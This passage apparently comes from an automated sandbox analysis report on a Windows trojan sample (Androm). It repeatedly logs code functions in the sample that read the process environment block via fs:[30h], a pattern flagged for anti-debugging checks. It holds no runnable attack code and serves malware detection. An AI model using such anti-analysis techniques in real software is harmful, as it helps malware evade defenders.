          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]3_2_00A252A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]3_2_00A252A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]3_2_00A252A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]3_2_00A252A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A252A5 mov eax, dword ptr fs:[00000030h]3_2_00A252A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]3_2_00A3AAB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]3_2_00A3AAB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5FAB0 mov eax, dword ptr fs:[00000030h]3_2_00A5FAB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A512BD mov esi, dword ptr fs:[00000030h]3_2_00A512BD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A512BD mov eax, dword ptr fs:[00000030h]3_2_00A512BD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A512BD mov eax, dword ptr fs:[00000030h]3_2_00A512BD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5DA88 mov eax, dword ptr fs:[00000030h]3_2_00A5DA88
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5DA88 mov eax, dword ptr fs:[00000030h]3_2_00A5DA88
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5D294 mov eax, dword ptr fs:[00000030h]3_2_00A5D294
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5D294 mov eax, dword ptr fs:[00000030h]3_2_00A5D294
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE129A mov eax, dword ptr fs:[00000030h]3_2_00AE129A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A52AE4 mov eax, dword ptr fs:[00000030h]3_2_00A52AE4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]3_2_00AE4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]3_2_00AE4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]3_2_00AE4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]3_2_00AE4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]3_2_00AE4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]3_2_00AE4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]3_2_00AE4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]3_2_00AE4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]3_2_00AE4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]3_2_00AE4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]3_2_00AE4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]3_2_00AE4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]3_2_00AE4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4AEF mov eax, dword ptr fs:[00000030h]3_2_00AE4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A25AC0 mov eax, dword ptr fs:[00000030h]3_2_00A25AC0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A25AC0 mov eax, dword ptr fs:[00000030h]3_2_00A25AC0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A25AC0 mov eax, dword ptr fs:[00000030h]3_2_00A25AC0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A23ACA mov eax, dword ptr fs:[00000030h]3_2_00A23ACA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A52ACB mov eax, dword ptr fs:[00000030h]3_2_00A52ACB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF8ADD mov eax, dword ptr fs:[00000030h]3_2_00AF8ADD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A212D4 mov eax, dword ptr fs:[00000030h]3_2_00A212D4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A24A20 mov eax, dword ptr fs:[00000030h]3_2_00A24A20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A24A20 mov eax, dword ptr fs:[00000030h]3_2_00A24A20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1229 mov eax, dword ptr fs:[00000030h]3_2_00AE1229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A64A2C mov eax, dword ptr fs:[00000030h]3_2_00A64A2C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A64A2C mov eax, dword ptr fs:[00000030h]3_2_00A64A2C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]3_2_00A4A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]3_2_00A4A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]3_2_00A4A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]3_2_00A4A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]3_2_00A4A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]3_2_00A4A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]3_2_00A4A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]3_2_00A4A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A229 mov eax, dword ptr fs:[00000030h]3_2_00A4A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]3_2_00A4B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]3_2_00A4B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]3_2_00A4B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]3_2_00A4B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]3_2_00A4B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B236 mov eax, dword ptr fs:[00000030h]3_2_00A4B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A28239 mov eax, dword ptr fs:[00000030h]3_2_00A28239
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A28239 mov eax, dword ptr fs:[00000030h]3_2_00A28239
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A28239 mov eax, dword ptr fs:[00000030h]3_2_00A28239
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A38A0A mov eax, dword ptr fs:[00000030h]3_2_00A38A0A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h]3_2_00A25210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A25210 mov ecx, dword ptr fs:[00000030h]3_2_00A25210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h]3_2_00A25210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A25210 mov eax, dword ptr fs:[00000030h]3_2_00A25210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2AA16 mov eax, dword ptr fs:[00000030h]3_2_00A2AA16
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2AA16 mov eax, dword ptr fs:[00000030h]3_2_00A2AA16
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A43A1C mov eax, dword ptr fs:[00000030h]3_2_00A43A1C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AEAA16 mov eax, dword ptr fs:[00000030h]3_2_00AEAA16
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AEAA16 mov eax, dword ptr fs:[00000030h]3_2_00AEAA16
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ADB260 mov eax, dword ptr fs:[00000030h]3_2_00ADB260
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ADB260 mov eax, dword ptr fs:[00000030h]3_2_00ADB260
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF8A62 mov eax, dword ptr fs:[00000030h]3_2_00AF8A62
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A65A69 mov eax, dword ptr fs:[00000030h]3_2_00A65A69
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A65A69 mov eax, dword ptr fs:[00000030h]3_2_00A65A69
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A65A69 mov eax, dword ptr fs:[00000030h]3_2_00A65A69
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A6927A mov eax, dword ptr fs:[00000030h]3_2_00A6927A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h]3_2_00A29240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h]3_2_00A29240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h]3_2_00A29240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A29240 mov eax, dword ptr fs:[00000030h]3_2_00A29240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1A5F mov eax, dword ptr fs:[00000030h]3_2_00AE1A5F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AEEA55 mov eax, dword ptr fs:[00000030h]3_2_00AEEA55
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AB4257 mov eax, dword ptr fs:[00000030h]3_2_00AB4257
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1BA8 mov eax, dword ptr fs:[00000030h]3_2_00AE1BA8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h]3_2_00A54BAD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h]3_2_00A54BAD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A54BAD mov eax, dword ptr fs:[00000030h]3_2_00A54BAD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF5BA5 mov eax, dword ptr fs:[00000030h]3_2_00AF5BA5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF9BBE mov eax, dword ptr fs:[00000030h]3_2_00AF9BBE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF8BB6 mov eax, dword ptr fs:[00000030h]3_2_00AF8BB6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE138A mov eax, dword ptr fs:[00000030h]3_2_00AE138A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ACEB8A mov ecx, dword ptr fs:[00000030h]3_2_00ACEB8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ACEB8A mov eax, dword ptr fs:[00000030h]3_2_00ACEB8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ACEB8A mov eax, dword ptr fs:[00000030h]3_2_00ACEB8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ACEB8A mov eax, dword ptr fs:[00000030h]3_2_00ACEB8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A31B8F mov eax, dword ptr fs:[00000030h]3_2_00A31B8F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A31B8F mov eax, dword ptr fs:[00000030h]3_2_00A31B8F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ADD380 mov ecx, dword ptr fs:[00000030h]3_2_00ADD380
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5138B mov eax, dword ptr fs:[00000030h]3_2_00A5138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5138B mov eax, dword ptr fs:[00000030h]3_2_00A5138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5138B mov eax, dword ptr fs:[00000030h]3_2_00A5138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A52397 mov eax, dword ptr fs:[00000030h]3_2_00A52397
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5B390 mov eax, dword ptr fs:[00000030h]3_2_00A5B390
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A24B94 mov edi, dword ptr fs:[00000030h]3_2_00A24B94
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4EB9A mov eax, dword ptr fs:[00000030h]3_2_00A4EB9A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4EB9A mov eax, dword ptr fs:[00000030h]3_2_00A4EB9A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]3_2_00A503E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]3_2_00A503E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]3_2_00A503E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]3_2_00A503E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]3_2_00A503E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A503E2 mov eax, dword ptr fs:[00000030h]3_2_00A503E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A21BE9 mov eax, dword ptr fs:[00000030h]3_2_00A21BE9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4DBE9 mov eax, dword ptr fs:[00000030h]3_2_00A4DBE9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AD23E3 mov ecx, dword ptr fs:[00000030h]3_2_00AD23E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AD23E3 mov ecx, dword ptr fs:[00000030h]3_2_00AD23E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AD23E3 mov eax, dword ptr fs:[00000030h]3_2_00AD23E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA53CA mov eax, dword ptr fs:[00000030h]3_2_00AA53CA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA53CA mov eax, dword ptr fs:[00000030h]3_2_00AA53CA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A553C5 mov eax, dword ptr fs:[00000030h]3_2_00A553C5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A309 mov eax, dword ptr fs:[00000030h]3_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE131B mov eax, dword ptr fs:[00000030h]3_2_00AE131B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2DB60 mov ecx, dword ptr fs:[00000030h]3_2_00A2DB60
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AB6365 mov eax, dword ptr fs:[00000030h]3_2_00AB6365
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AB6365 mov eax, dword ptr fs:[00000030h]3_2_00AB6365
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AB6365 mov eax, dword ptr fs:[00000030h]3_2_00AB6365
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3F370 mov eax, dword ptr fs:[00000030h]3_2_00A3F370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3F370 mov eax, dword ptr fs:[00000030h]3_2_00A3F370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3F370 mov eax, dword ptr fs:[00000030h]3_2_00A3F370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A53B7A mov eax, dword ptr fs:[00000030h]3_2_00A53B7A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A53B7A mov eax, dword ptr fs:[00000030h]3_2_00A53B7A
